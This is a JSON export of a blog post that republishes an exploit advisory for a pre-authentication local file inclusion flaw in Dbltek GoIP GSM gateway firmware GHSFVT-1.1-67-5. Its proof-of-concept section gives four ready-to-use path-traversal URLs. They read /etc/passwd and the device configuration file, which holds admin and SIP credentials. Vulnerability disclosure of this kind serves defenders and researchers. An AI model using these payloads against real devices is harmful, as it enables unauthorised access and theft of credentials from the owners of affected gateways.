{"id":20920,"date":"2022-02-22T09:31:42","date_gmt":"2022-02-22T06:31:42","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166076\/dbltekgoiup-lfi.txt"},"modified":"2022-02-22T10:13:03","modified_gmt":"2022-02-22T06:43:03","slug":"dbltek-goip-ghsfvt-1-1-67-5-local-file-inclusion","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/dbltek-goip-ghsfvt-1-1-67-5-local-file-inclusion\/","title":{"rendered":"Dbltek GoIP GHSFVT-1.1-67-5 Local File Inclusion"},"content":{"rendered":"

# Exploit Title: Dbltek GoIP – Local File Inclusion
\n# Date: 20.02.2022
\n# Exploit Author: Valtteri Lehtinen & Lassi Korhonen
\n# Vendor Homepage: http:\/\/en.dbltek.com\/index.html
\n# Software Link: –
\n# Version: GHSFVT-1.1-67-5 (firmware version)
\n# Tested on: Target is an IoT device<\/p>\n

# Exploit summary
\nDbltek GoIP-1 is a VoIP-GSM gateway device, which allows making calls and sending SMS messages using SIP.
\nThe device has a webserver that contains two pre-auth Local File Inclusion vulnerabilities.<\/p>\n

Using these, it is possible to download the device configuration file containing all device credentials (including admin panel credentials and SIP credentials) if the configuration file has been backed up.<\/p>\n

It is probable that also other models and versions of Dbltek GoIP devices are affected.<\/p>\n

Writeup: https:\/\/shufflingbytes.com\/posts\/hacking-goip-gsm-gateway\/<\/p>\n

# Proof of Concept
\nAssuming the device is available on IP 192.168.9.1.<\/p>\n

Download \/etc\/passwd
\nhttp:\/\/192.168.9.1\/default\/en_US\/frame.html?content=3D..%2f..%2f..%2f ..%2f..%2fetc%2fpasswd
\nhttp:\/\/192.168.9.1\/default\/en_US\/frame.A100.html?sidebar=3D..%2f..%2f ..%2f..%2f..%2fetc%2fpasswd<\/p>\n

Download device configuration file from \/tmp\/config.dat (requires that the configuration file has been backed up)
\nhttp:\/\/192.168.9.1\/default\/en_US\/frame.html?content=3D..%2f..%2f..%2f..%2f..%2ftmp%2fconfig.dat
\nhttp:\/\/192.168.9.1\/default\/en_US\/frame.A100.html?sidebar=3D..%2f..%2f..%2f..%2f..%2ftmp%2fconfig.dat<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Dbltek GoIP – Local File Inclusion # Date: 20.02.2022 # Exploit Author: Valtteri Lehtinen & Lassi Korhonen # Vendor Homepage: http:\/\/en.dbltek.com\/index.html # Software Link: – # Version: GHSFVT-1.1-67-5 (firmware version) # Tested on: Target is an IoT device # Exploit summary Dbltek GoIP-1 is a VoIP-GSM gateway device, which allows making calls …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-20920","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/20920","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=20920"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/20920\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=20920"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=20920"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=20920"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}